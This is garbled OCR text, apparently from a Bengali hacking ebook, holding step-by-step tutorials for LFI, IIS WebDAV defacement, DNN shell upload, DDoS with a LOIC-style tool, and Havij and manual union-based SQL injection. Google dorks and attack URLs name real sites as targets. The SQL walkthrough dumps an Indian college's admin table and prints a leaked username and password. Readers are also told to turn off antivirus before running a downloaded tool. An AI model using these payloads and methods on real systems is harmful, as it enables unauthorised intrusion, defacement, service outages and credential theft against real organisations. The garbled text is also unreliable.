হ্যাকিং করা হয় আসলে নিজের মেধা দিয়ে। আপনি যে ভাবে পারেন, হ্যাকিং করে যাবেন। আজ দেখাব হ্যাকিংয়ের 
আরেকটি জনপ্রিয় AAG! এটা অনেকেই ব্যবহার করেথাকে। চলুন তাহলে মূল পর্বে চলে যাওয়া AS! 


LFI! 
হ্যাকারদের 

একটি জনপ্ৰিয় ম্যাথড। এটি একটি সংক্ষিপ্ত নাম। এই সংক্ষিপ্ত শব্দটির পূর্ণরূপ হল 
Local File Inclusion. INST 

আপনাদের 

হাতে-কলমে দেখাব কিভাবে আপনি একটা সাইটে LFI Injection দিতে হয়। 

প্ৰথমে 


নিচের PHP কোডগুলো 


দেখুন... 


$page=$ GET[page]; 
include($page); 
Т» 


উপরে рар কোডটি অনেক ওয়েব ডেভেলপাররাই তাদের ওয়েবসাইটে ব্যবহার করে ۱ 


কিন্ত এটি আসলে তারা ভুল করে থাকে। কারণ এই $288০কোডটি sanitized না এবং এটি এটা হ্যাকারদের পথটা 
সহজ করে GA মূলতঃ এই কোডটি হ্যাকাররা তাদের LFI হ্যাকিংয়ের কাজে ব্যবহার করে থাকে। আপনি যদি 
বিভিন্ন সাইট ঘুরে থাকেন, তাহলে হত নিচের কোড সাইটের লিংক দেখতে পারবে। 


www.mywebsite.com/index.php?page-products.php 


আপনিএই ধরনের সাইটে, কোন ধরনের পরীক্ষা ছাড়াই বুঝতে পারবেন যে, 
www.purepdfbook.com 
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NS হ্যাকিং [XP এবং 7 এ ] সাথে ভিডিও 


আসসালামু আলাইকুম, সবাইকে আবারওস্বাগতম জানিয়ে আজকের টিউন শুরু করছি। 


কেমন আছেন আপনারা ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে খুবই ভাল আছেন। আজ আবারও আপনাদের 
জন্য এনেছি ওয়েব হ্যাকিং নিয়ে ۱ তো কথা কম বলে কাজের কথায় আসি। 
আজ আমি আলোচনা করব 115(115=Тһе Internet Information Server Attack) নিয়ে | 


উইন্ডোজ এক্সপি এর 5 
S.Run 3 


%WINDIR%EXPLORER.EXE ,:: (20DOA4FEO-3AEA-1069-A2D8-08002B30309D]:: (BDEADFOO-C265-11d0-BCED- 
ООДОСООАВ5ОЕ) 
লিখে Enter চাপুন | 


i. একটি ফোল্ডার আসবে যার নাম "WEB FOLDER" | 


v. এখন Right click করে New>Add Web Folder>vulnerable website address . 
Google Dork :- "Powered by IIS” 
৪.ক্লিক Next>Next>Finish . 
৫.ডাবল ক্লিক করে তোমার ডিফেস কপি পেস্ট করে দিন | 


এখন তোমার ডিফেস পেজ : http://www.target.com/deface.html 
ভিডিও টিউটোরিয়াল : http://www.youtube.com/watch ?v=P4ISzsSBTik 


বিঃদ্রঃ Microsoft IF সাইটের vulnerability ঠিক করেছে, তাই vulnerable সাইট পাওয়া কষ্টকর | 


>>উইন্ডোজ 9 এর নিয়মাবলি >> 


কিভাবে উইন্ডোজ ৭ এ IIS Exploit হ্যাকিং করবেন ? পারবেন ? আপনাদের জন্য এর আগে টিজে পিনিক্স ক্র একটা পোষ্ট 
করেছিল IIS Exploit এর উপর। তাহলে আর কথা নয়, এখনই শুরু করে দেই টিউটোরিয়ালটি icon smile IIS Exploit সম্পূর্ণ 
বাংলা হ্যাকিং টিউটোরিয়াল 


প্রথমে My Computer এর যান। এবার খালি জায়গায় রাইট বাটন ক্লিক করে Add a network Location এ ক্লিক করুন। 


এবার Next বাটনে ক্লিক করুন। 


ছবি 


www.purepdfbook.com 
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5 of the website, FTP site, or network location t! 


Internet or network address 
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Extract Here 
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Delete 


Rename 
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CV FILE (Е) » New folder (2) + 
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as desktop background 
Edit 


Print 


Preview 
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Delete 


Rename 


Properties 
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10 Cyber CadeT Fore 


http Power.asp; jpg 


Type webadress And file name... 


tCode asp 
tPayHandle 
GetPayNotify asp 
haryang2 
Head asp 
Head! asp 


hyfabu.asp 


listad asp 
Login.asp 


lostpass 5 


E ::-:: Powe3r_1n~10 Cyber CadeT Forc.. এ: Umer Rock's ASP SHEI 


ft E’ Feedback - 
Type webadress And file name... 


Dvbbs8.2.0_ac.exe 5,254 Kbytes 
edit.asp 15 Kbyt 
editad.asp 15K 
editad save.asp 5 Kbytes 
edituser.asp 7 
edituser save.asp 5 Kbytes 
fabu.asp 8 Kbytes 
fabu Save.asp 5 Kbytes 
falsh.swf 

favicon.ico 

float js 

Foot.asp 

Gbook asp 

GetCode.asp 

GetPayHandle.asp 

GetPayNotify asp 5 Kbytes 
haiyang2 db 201104200200.BAK 7,114 Kbytes 
Head.asp 3 Kbytes 
Headt.asp 3 Kbytes 
hyfabu.asp 14 Kbytes 
hyfabu save.asp 

Index.asp 13 Kbytes 
ip.asp 1 Kbytes 
listad.asp 6 Kbytes 
Login.asp 

lostpass.asp 

md32 asp 

md5.asp 

message.asp 6 Kbytes 
money.asp 14 Kbytes 
nc selcolor.him 

News.asp 
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এবার আপনারা deface html ফাইলটি ওপেন করুন। 


এবার এটার উপর রাইট বাটন ক্লিক করে open with notepad এ ক্লিক করুন। 


Open 
Open in Same Win: 


powennlühtm р, 


Scan with ESET NO 


Advanced options 


= Pictures 
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ক্যামিক হ্যাকিং অধ্যায়-১০ 
DNN (Dot Net Nuke) সাথে ভিডিও ওয়েবসাইট হ্যাকিং 


DNN কি ?DNN হল মাইক্রোসফট এর এসপি (ASP) প্রোগ্রামিং ল্যাংগুয়েজ এর একটা বাগ (88). এর সম্পূর্ন 
নামঃ Dot Net Nukel এর মাধ্যমে আমরা ফাইল/শেল আপলোড করতে পারব | যে কোন সাইট কি হ্যাক করা 
যাবে ? না, যে সকল সাইট এই Vulnerable СТ সকল সাইট হ্যাক করা MAI অনেক সাইট এ Hackable.s| কি 
ভাবে পাব Vulnerable সাইট? মামু আছে না! মামু থাকতে চিন্তা নাই। আমি কয়েকটা کت‎ দিচ্ছি যা দিয়ে সহজেই 
Vulnerable সাইট বের করতে পারবেন। 


inurl:/portals/Qinurl:Providers/HtmlEditorProviders/Fck/feklinkgallery.aspxinurl:”Fck/feklinkgallery.aspx” 
গুগলে এটি লিখে সার্চ দিলে অনেক Vulnerable ওয়েবসাইট পেয়ে যাবে তার থেকে যেকোন একটি বেছে 3۱ 


inuri-"/Providers/HtmlEditorProviders/F ck/fcklinkgallery.aspx” 


۱۱ এখন রেজাল্ট এর একটা সাইটএ ক্লিক করুন আপনি এইরকম দেখতে পাবেন ছবি 


৩. File (A File On Your Site) লিখা রেডিও বাটনে ক্লিক করো | 


ছবি 


Link Type: 


URL ) A Link To An External Resource ) 
Page ) A Page On Your Site ) 
9 File ( AFile On Your Site ) 
File Location: 
Root 


File Name: 
0.0 


i$ Blue Fox Billiards | Billiards | Bar | Grill > Li.) == 


Javascript: doPostBack( ctlURLScmdUpload 


Link Type: 
URL ( ALink To An External Resource ) 
Page ( A Page On Your Site ) 


9 File ) AFile On Your Site ) 


6. Script রান করালে ফাইল Upload করার জন্য চিত্রের মত Browse বাটনটি 515 


Link Type: 
URL ( ALink To An External Resource ) 
Page ( A Page On Your Site ) 
9 File ) AFile On Your Site ) 
File Location: 


Root - 


File Name: 


Browse 


৬.এখানে Browse করে Jpg,Gif,eswf ইত্যাদি ফাইল Upload করতে NAA! এখানে যাই Upload করবে তা 
সাধারন ভাবে /portals/0/ তে Upload হবে। যদি তোমার সাইটের নাম হয় target.net এবং তোমার Upload করা 
ফাইল এর নাম যদি হয় test.swf তাহলে তোমার ফাইল পাবে http://www.Target.net/portals/O/test.swf Со! 
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DdoS কি ? 0005 আ্যাটাক কি কেন কিভাবে ? কিভাবে 
ব্যাসিক হ্যাকিং-১২ -DdoSÍ$ ?DdoS আযাটাক কি কেন কিভাবে ? 

কিভাবে Ddos আ্যাটাক করব ? 

প্রথম প্রশ্ন DoS জিনিস টা কি ? DDoS এবং DoS কি একই জিনিস 2 


DoS এর পরিপূর্ণ রূপ হচ্ছে Denial of Service | DoS আযাটাক এ একটা পিসি অথবাএকটা ইন্টারনেট কানেকশন | 
আযাটাকার ] থেকে একটা নির্দিষ্ট সার্ভার [ভিকটিম 1 এ অনবরত [ FE | TCP/UDP প্যাকেট পাঠানো হয় | 
এতে করে ওই নিৰ্দিষ্ট সার্ভার এর ব্যান্ডউইথ এবং অন্যান্য সবকিছু ওভারলোড হয়েযায় | ফলাফল ? এর পর যেই 
ওই সার্ভার এ কানেকশন করার চেষ্টা করবে , তাকেই সার্ভার সার্ভিস দেওয়া থেকে বিরত থাকবে ! 

অর্থাৎ সোজাসুজি Denial of Service হবে সার্ভার থেকে | 


এবার DDoS | এটার পূর্ণ রূপ হচ্ছে Distributed Denial of Service | ব্যাপার টা এভাবে চিন্তা করুন ... আপনি 
রাস্তা দিয়ে হেটে যাচ্ছেন হঠাৎ করে আপনাকেএকজন ছিনতাইকারী আক্রমন করলো | 

এখন আপনি যদি গায়ে গতরে তার থেকে একটু শক্তিশালী হয়ে থাকেন এবং ভাগ্য খানিক টা সুপ্ৰসন্ন হয়ে থাকলে 
আপনি উলটোওই ছিনতাইকারী কে পিটিয়ে তক্তা বানিয়ে দিয়ে পারেন | 

কিন্ত যদি আপনাকে ১ জনের জায়গা তে ১০ -১২ জন আক্রমন করে ? 

১৫ দিন পর হাসপাতাল থেকে ছাড়া পাবেন ঠিক এরকম ব্যাপার ই হচ্ছে DDoS I 

DoS এর মত করেই কাজ করে কিন্তু DDoS এ অনেক বেশী আ্যাটাকার একসাথে কাজ করে | ফলাফল ভয়াবহ | 


আমার কথাবার্তা কি একটু Фер লাগছে ?:5 এতখন যা বললাম তা কি দুর্বোধ্য লাগছে ? তাহলে নিচের চিত্রগুলো 
দেখুন বুঝে জাবেন কিভাবে DoS এবং DDoS কিভাবেকাজ করে | 


একটা সাধারণ কানেকশন কাজ করে এই ভাবে নিচের চিত্রের মত করে 


কিন্তু DoS আযাটাক টা হচ্ছে নিচের মত 


আর DDoS আ্যাটাক হচ্ছে নিচের চিত্রের মত 
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THE HOSTING 
[ leTCRAFT ТЕТ INDUSTRY'S FIRST SEE WHY 
BILL OF RIGHTS CUSTOMER BILL IT'S BETTER 


KA OF RIGHTS 
What at site running 5еггсһ =) 12 বক্সে (е খুন E: & 


Netcraft Services ICO এবং Search 


Internet Exploration 


Internet Data Mining 


Uptime for www.demon.net 
Note: Uptime - the time since last reboot Generated on 7-May-2009 


Performance 
uuu, denon, net 


Whats that site running ? мададе» Search | 


OS, Web Server and Hosting History for 


nd was running Apache on Linux when last queried at 31-Mar-2012 13:52:5 
এটা লক্ষ করুন 


Last changed IP address 


লক্ষ্যকরুন Apache/l.3.27 (Unix) লেখা fë | এটা ওই নির্দিষ্ট সাইট এর সার্ভার ।এখানে যদি নিচের ৩ টার 
যেকোনো একটা দেখেন তাহলে বুঝবেন যে এই সাইট এ ডসমজ্যাটাক করে ফলাফল পাওয়া সম্ভব | 


Apache 1.x 
Apache 2.x 
GoAhead WebServer 


THBHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHE 
এবার শুরু হয়ে যান আসল খেলার জন্য DoS কি ? DoS 910% কি কেন ? 


সফটওয়্যারটি ডাউনলোড বা এটি নিয়ে কাজ করার আগে আপনার পিসির এন্টিভাইরাসের প্ৰোটেকশন অফ ۱ 
এটিকে আপনার এন্টি ভাইরাস ট্রোজান বা ভাইরাস হিসাবে 19095 করতে পারে তবে ভয় নাই, এটি কোন ভাইরাস 
বা ট্রোজান নয়, নির্ভয়ে ইউজ করুন। 


সফটওয়্যারটি প্রথমে নিচের লিঙ্ক থেকে ডাউনলোড করে নিন এবং Extract করুন। 


http://www.mediafire.com/?famiivi799a9459 


সফটওয়্যারটিডাবল ক্লিক করে ওপেন করুন। যাদের উইন্ডোজ ৭ তারা ফাইলে রাইট ক্লিক করে Run as 
administrator এ ক্লিক করে ওপেন করুন। নিচের মত উইন্ডো আসবে। 


ЕТТЕ 


HTTP Subs&e 
1 


10 Ë wat tor reply 


[- 1. Select your target — — — — — — —— 
| URL 18505519058] 


TCP / UDP message 
Å cat s fine too. Desudesudesu- 


Praetox:com 


5. URL TH যে কোন সাইটের নাম TI 


(সবাই মিলে একটি সাইট সিলেক্ট করতে হবে, সিঙ্গেল এটাকে সাইটের কিছুই হবে না। টপ সাইটের লিস্ট 
http://www.alexa.com/topsites/ ,এখান থেকে ۱ তাই সবাই মিলে একটি সাইট সিলেক্ট করুন, যেটিকে ডাউন করতে 
চান। ) 


r-1 Select your target T h 


| 
| URL hipJbbsfnici/| | Lock 


| Lock on 


NONE! 


10 ЕЙ wat tor геру 


২. "lock on" সিলেক্ট করুন। 


1 Select your target 
URL Мр/мілісін 


| 


TCP / UDP message 
Å cat в fine too. Desudesudesu- 


Praetox:com 


৩. দেখবেন আইপি লক হয়ে গিয়েছে | 


1. Select your target га. Ready? 


URL Марла лісам | Lock on | 


Р | Lock on | 


164.100.52.73 


TCP / UDP message 
Å cat s fine too. Desudesudesu- 


| IMMA CHARGIN MAH LAZER 


-m| Ex 


Praetox:com 


8. চিত্র এর মত করে "http" সিলেক্ট করুন। 


TCP / UDP message 
Å cat s fine too. Desudesudesu- 


Praetox:com 


164.100.52.73 


TCP / UDP message 
A cat i fine too. Desudesudesu- 


<= faster Speed sve -> 


¢.Threads বক্স এ 1000 টাইপ ۱ 


TCP / UDP message 
A cat 6 fine too Desudesudesu- 


ww В 


৬. এবার "EMMA CHARGIN MAH LAZER" বাটনটি তে ক্লিক করুন। 


TCP / UDP message 
A cat 6 fine too Desudesudesu- 


০০০০০০০০০০০ 


DoS / DDoS এর থেকে বাঁচার উপায় কি? 


E valva ic^ от 


চট এর Microsoft Knov 


К тел. ro kn 


— 


+ 


E শৰ্কৰ ۱ x 
іе Lope ১৮৮ 
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(Havii SGLi injection)ওয়েবসাইট হ্যাকিং 
SQLi টিউটোরিয়াল УУ 


Download 
Havij 1.5 Pro: http://www.mediafire.com/?s7a89dxmfwxcyij 


* প্ৰথমে Google.com! ۱ 
* এবার নিচের গুগল ডকটি লিখে সার্চ ۱ 


"inurl:php?id-" 


e তাহলে অনেকগুলো ফলাফল দেখাবে। 
e এখানে অনেক Dork পাবেন : http://pastebin.com/DvnHxg7i 


ওয়েৰ চিত্র Maps অনুবাদ দস্তাবেজ গোষ্ঠীসমূহ Gmail 


IG ="nuriphp?id=" 


° দেখুন ফলাফল দেখাচ্ছে “AA 2,010,000,000fb ফলাফল (0.23 সেকেন্ড) ” 

° এবার যে কোন একটি সাইটে প্ৰবেশ 0۱ 

* এছাড়াও আপনি যে কোন সাইট ধরতে পারবেন, СТ সব সাইটের পর php?id- আছে| সেই সব সাইটে ۱ 
যেমনঃ 


http://www.paulprescott.com/theme.php?id=10 


* আমরা এই সাইটটিকে টার্গেট ۱ 


e এবার আপনার টার্গেট করা সাইটের লিংকের শেষে দেখেন এমন একটা আছে ID=XX, এখানে XX এর জায়গায় যেকোন 
নং আছে। যেমন আমার এখানে আছে 10510 

° এবারর এই লিংকের শেষে একটা (^) লাগান। 

* এবার এন্টার দিন। 


m paulprescott.com/theme,r 
€ С © paulprescott.com 


You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ۲ 


ORDER BY id ASC’ at line 1 


! “aaye 4 e % Unsetected Ce 


erpi SØT, CON 


° এবার যদি উপরের মতো Error দেখায়, তাহলে বুঝবেন যে, সাইটটিতে inject FAT যাবে। 
° এবার “Havij” টুলসটা ওপেন করুন। তাহলে নিচের মতো 5۱ 


http://paulprescott.com/theme.php?id=10'| 


star Syntax: 2 


Auto Detect vi Method: |GET ۱ Type: | Auto рер 


Post Data: 


http/f/ITSec 
b*tp://forum.Itse 


Check for update 


Register 
^ 


> 
Settings 


http://paulprescott.com/theme.php?id=10' 


ste Syntax: 


Auto Detect >| Method |GET т Type: | Auto ре 


Post Data: 


© س‎ [5] ; 
Info Tables Read Files She y : / Settings 


Clear Log 


^ 


r?! [If injection failed, retry with a manual 


aulprescott.com/theme.php?id-10! 


Š Analyze 
Syntax: Е 


>| Method [GET - Ту এ ы 
= EEE Б Load Save 


[ез Read Files She Query Find Admin MD5 Settings 


& 


1 i 
Save Tables Save Data 


| 4 


¥ Use Group Concat (MySQL Only) м Allin one request 


If injection failed, retry with a manual keyv 


http://paulprescott.com/theme.php?id-10! 
Analyze 
Keyword: ito Dete Syntax z 


Auto Detect vj Method |GET ۱ Туре: | Auto Detect ~ 


1 


Tables Read Files She Find Admin 109 


Get Tables Get Columns 


Group | 1 


m 


http://paulprescott.com/theme.php?id-10' 


= Analyze 
Syntax: z 


| Auto Detect vj Method |GET ~| * | Auto Detect | г) 1 
| ——— — = —— ғ Load Save 


E 
Read Files 


( 


Allin one request Force to use i 


If injection failed, retry with a manual keyword. 


und; information s 
ound: paul third 


ott.com/theme.php?id=10' 
Syntax: 


Method: | СЕТ 


Bl 
Tables Read Files 


Get DBs Get Tables Get Columns 


mation schema 
paul third 


://paulprescott.com/theme.php?id=10" | 
Analyze 
Syntax: Я 
Auto Detect Method: (GET e: | Auto Detect v 7) å 
s کے‎ — k "শা Load Sav 


} T 
Find Admin MD5 Settings 


1 j 
Save Tables Save Data 


Group Concat (MySQL Only) 7 Al in one reques Force to 


l'm IDLE 


rmation_schema 
Found: paul_thi 


http://paulprescott.com/theme.php?id=10" } 

Analyze 
Syntax: 2 
Auto Detect Method GET  v|Type | Auto Detect v 


m 1] 3 dh 


Tables Read Files she Query 


Get Tables Get Columns \ Get Data Å 
W Å 


= | id SSW... е pe på 


| ytube 


P, [Iv i t Force to use i J| Clear list on get 


Clear Log 


ott.com/theme.php?id-10' } 11 
Analyze 
Syntax: z 


Method F. - HE, 1 
= = Load Save 


m |-] | এ T y 
Tables Read Files She ⁄ Find Admin MD5 Settings 


i i | | 


2 Сер Get Tables Get Columns Get Data ve Tables Save Data 


= || 
\ра thi е *| Lir password username | email 
аһ i> 


password admin 


| psgallry 


DJ ptube 


Group Concat (MySQL Only) 


Status: I'm IDLE 


ame=admin 


^o M 0 


http://paulprescott.com/theme.php?id=10'| 


Syntax: 2 


Database: Auto Detect >| Method kam 


Post Data; 


Settings 


Clear Log 


ү 1% ntp://paulprescott.com/theme.php?id=10"| 
S Азы к Analyze 
৬১ C ec Syntax: в Detec z 


)at Қ. m 055০১ | Method |GET ۱ Туре: (Auto Detect ৮) j 
MEE - = —— - ==="; bond Save 


Find Admin MD5 Settings 


Path to search: 7 ` ৬ 
@ Suc res: 200,500,301,3 Web ди 


Failture res: 4 4 404 Ha på 
Found Pages: 


| Page 


http://paulprescott.com/theme.php?id=10' 
Syn 


Auto Detect | Method |GET  v| Type: | Auto Detect v 


Path to search: 
S 


Failture res: 


/paulpresco copy contre 301 Moved Permanently 
| 


paulpresco omicpanel | 301 Moved Permanently 


301 Moved Permanently | 


Clear Log 


cnet লিখেছেন -আনিবাচিত Gara 


SQL injection Manual Live Hacking ওয়েবসাইট হ্যাকিং 


তাহলে কথা না বারিয়ে শুরু করি ! 
প্রথমে SQL INJECT করার জন্য আমাদের ভার্নাবল সাইট খুজতে হবে। 
এর জন্য আমরা dork use করব ! 
inurl:index.php?id= 
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID= 

inurl:play old.php?id= 
inurl:declaration more.php?decl id= 
inurl:Pageid- 

inurl:games.php?id- 
inurl:page.php?file= 
inurl:newsDetail.php?id= 

inurl: gallery.php?id= 


এই খানে কিছু dork আছে 50159790497 সাইট ASA জন্য | 
8500 SQL dorks list 

http://pastebin.com/dzknXjgP 

or 

http://pastebin.com/ayV6tNS2 


প্রথম এ একটা dork নিয়ে আমরাvww.g০০gle.com এ SEARCH দিব | 


inurl:news-and-events.php?id= 


এই dork দিয়া SEARCH দিয়ে আমি অনেক 5190 দেখলাম সেখান থেকে আমি একটা সাইট নিলাম | 
যেমন : 
http://www.eastodissa.ac.in/news-and-events.php?id=22 


ছবিঃ 


e inurl:news-and-events.php?id- - Google Search - Mozilla Firefox 


googl 


+faroque Search Images Maps Play YouTube News Gmail Drive 


m C 


n/news-and-events.php?id 


Calendar 


Hurry Up, avail the opportunity of free e-admission process for + 2 Science, Diplom 


Achievement 


এখন injectable সাইটে inject করার জন্য আপনাকে প্রথমে ডাটাবেজের কলাম বের করতে হবে | 


এখানে আমাদের ভার্নাবল সাইট 


http://www.eastodissa.ac.in/news-and-events.php?id=22 


যাই হোক , আমাদের ডাটাবেজের কলাম বের করতে হলে +order+by+ কমান্ড দিতে হবে | 


তাহলে লিংকটি দাড়ায় 


http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+ 


এখন + এর শেষে আপনাকে 1 থেকে BE করে তত WS চেষ্টা করতে হবে | 
এখন 1 নিয়ে দেখেন 
তাহলে লিংকটি দাড়ায় 


http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1-- 


নাহ , তাহলে সাইটে কোনো ডাটা মিস করতেছে না | 


আবার 2 দিয়ে চেষ্টা করি 


www.purepdfbook.com 


http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2-- 


na, B.Tech. and M. Tech. at EAST Campus, Prachi vihar, Phulnakhara, Bhubaneswar 


5th semester Electrical Engineering, position 3rd in Debate 


5th semester Electrical Engineerin 


নাহ , এবারও ডাটা মিস করতেছে না | 


এবাবে 3,4,5 করে 7 পর্যন্ত গেলাম | 


8 এ গেলে পুরো সাইট 501544 দেখায় | 


(অনেক সময় দেখা যায় 


www.site.com/index.php?id=1 order 999- [ no error ] 
অৰ্থাৎ order by 999 দিলেও কোন error AAN না | 


এক্ষেত্ৰে = এর পর + এবং id=1 এর পর “sign দিতে হবে | 
তাহলে সম্পূৰ্ণ লিঙ্কটি হবে 


www.site.com/index.php?id=1' order by 999—+ 
এবার পেজে error দেখাবে | 


বাকি অংশগুলো সাধারন sal Injection এর মতই হবে |) 


http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8-- 


www.purepdfbook.com 


3rd in Debate competition at Institu 


Latest News Hurry Up, avail the opportunity of 


ACHIEVEMENT Achievement 


ইরর এরকমের হতে পারে | 


Could not connect to MySQL server: Unknown column '8' in ‘order clause’ | 


অর্থাৎ এই সাইটের ডাটাবেজের কলাম 7 টি | 


এখন আমাদের দেখতে হবে এই 7টা কলামের ভেতর ভাৰ্নাবল কোনটি 144 জন্য আমাদের আবার কমান্ড ব্যবহার করতে 
হবে | 
কমান্ড টি 


+union+select+1,2,3,4,5,6,7-- 
তাহলে লিংক টি দাড়াবে 


http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7-- 


www.purepdfbook.com 


Hurry Up, avail the opportunity of free e-admissic 


ACHIEVEMENT | Achievement 


(উল্লেখ , এখানে news-and-events.php?id- এর পর একটি -দেয়া হয়েছে ( 
এখন আপনি ভার্নাবল কলাম দেখতে পাবেন | 

এই সাইটের ভার্নাবল কলাম 2,3,দেখাবে | 

এখানে আমরা 2 নম্বর কলাম নিয়ে কাজ করবো | 

এখন আমরা ভার্নাবল কলামের ভার্সন বের করবো | 

এর জন্য আপনাকে আবার একটি কমান্ড ব্যবহার করতে হবে | 

এখন আগের লিংকে BY 2 এর জায়গায় @@versionhiw হবে | 


তাহলে লিংক টি দাড়ায় 


www.purepdfbook.com 


Hurry Up, avail the opportunity of free e-admiss 


এই লিংকে গেলে আমরা ভার্সন দেখতে পাবো | 
এটার ভার্সন 5.1.68-community 


ভার্সন 5 এর নিচে সাইট গুলো হবে না তা বাদ দিয়ে অন্যগুলো সাইট inject করতে চেষ্টা করবেন | 


এখন আমরা আরেকটি কমান্ড ব্যবহার করে টেবিল বের করব | 

এক্ষেত্রে ভার্নাবল কলামের বদলে group concat(table name) কমান্ড দিবো এবং শেষ কলামের পর 
+from+information schema.tables+where+table schema-database()-- কমান্ড দিবো 1 

তাহলে লিংকটি দাড়ালো 


http://www.eastodissa.ac.in/news-and-events.php?id=- 
22+union+select+1, group concat(table name),3,4,5,6,7--from-information schema.tables+where+table schem 


a=database()-- 


লিংকে গেলে আপনি কিছু টেবিল দেখতে পাবেন 
ছবিঃ 


www.purepdfbook.com 


ree e-admission process for + 2 Science, Diploma, B.Tech. and M. Tech. at EAST Campus, Prachi vihar, Phulnakhara, Bhubaneswar 


Achievement 


এই সাইটের টেবিল গুলো হল 


est achievement,est admin,est adminlog,est companyrecord,est facprofile,est news,est notice,est onlineapplicatio 
n,est placementrecord 


এখন এখান থেকে এডমিন টেবিল বের করতে হবে | 


এক্ষেত্রে আপনাকে একটু বৃদ্ধি খাটাতে হবে | যেমন এখানে est achievement, est companyrecord এর এডমিন টেবিল হবে 
SE IE 


একমাত্ৰ est admin এডমিন টেবিল মনে হয় | 
ধরে নিতে না পারলে বা ভুল ধরলে সমাস্যা নেই | 


কমান্ডের মাধ্যমে বের করতে হবে | এক্ষেত্রে আপনাকে ভার্নাবল সাইটের বদলে group concat(column name) কমান্ড দিতে 
ЗЯ I 


এবং শেষ কলামের পর «from information schema.columns where table name= এর পর আপনার ধরে নেয়া এডমিন 
টেবিলের CHARS ASA দিতে হবে | 


এই লিংক থেকে এডঅন টি ডাউনলোড করে ইন্সটল করেন ফায়ারফক্স ব্রাউজার | 
https://addons.mozilla.org/en-US/firefox/addon/hackbar 


এখন হ্যাকবার টি ওপেন করেন Е9 চেপে 


www.purepdfbook.com 
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এবং শেষ কলামের পর +from+est admin-- বসাতে হবে | 


+from+ এর পর est admin দিলাম কারন এখানে এডমিন টেবিল est admin | 


তাহলে লিংক টি দাড়ায় 


http://www.eastodissa.ac.in/news-and-events.php?id=- 


22+union+select+1,group concat(userld,0x3a,password,0x3a),3,4,5,6,7+from+est admin-- 


©) Eastern Academy of Science & Technology (EAST) - Mozilla Firefox 


File Edit View History Bookmarks Tools Help 


Eastern Academy of Science & Technolog... X | *‏ رز 


MOST VISITED LINKS 


© Mandatory Disclosure 


© Minimum Disclosure 


© Photo Gallery 


5 Alumni 
| °! Press Release 

© Jobs 

° Weekly News Letter 


Latest News i 


ACHIEVEMENT 


EAST Boys & Girls stood first in Musical 
competition organized by OTV. 


EAST received, Best Discipline award in 
University annual sports event. 


দেখবেন আপনি ইউজারনেম পেয়ে ۱ 


এখানে ইউজারমেম পাসওয়ার্ড হচ্ছে trustadmin:isti$$9!5!2013: 
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арб হ্যাকিং 8 
কিভাবে ওয়েবসাইটে শেল আপলোড করবেন 331 


আজকে আমি আপনাদের দেখাব কিভাবে shell উপলোড করতে হয় LiveHTTPHeaders দিয়ে 
লিখেছেনঃ ফারুক আহমেদ 


মজিলা ফায়ারফক্স 
এডঅন ফায়ারফক্স এর জন্য ডাউনলোড করুণ নিচ ETF! 
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